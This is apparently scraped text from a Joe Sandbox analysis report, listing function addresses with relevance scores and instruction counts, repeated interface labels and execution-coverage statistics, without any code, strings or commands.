APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD34951C29 Relevance: .4, Instructions: 390COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD3495149A Relevance: .1, Instructions: 107COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD349514C1 Relevance: .0, Instructions: 41COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348840FA Relevance: .2, Instructions: 221COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD34883E65 Relevance: .2, Instructions: 163COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD34889907 Relevance: .1, Instructions: 140COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD3488A769 Relevance: .1, Instructions: 140COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD34885F28 Relevance: .1, Instructions: 119COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD34882EFA Relevance: .1, Instructions: 111COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD3488EFD8 Relevance: .1, Instructions: 80COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD34887A74 Relevance: .1, Instructions: 79COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348851B0 Relevance: .1, Instructions: 77COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 15.2% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 0% |
Total number of Nodes: | 50 |
Total number of Limit Nodes: | 4 |
Graph
Function 028879F7 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02887A14 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0288819A Relevance: 1.6, APIs: 1, Instructions: 53COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0103D400 Relevance: .1, Instructions: 75COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0103D3FB Relevance: .1, Instructions: 56COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|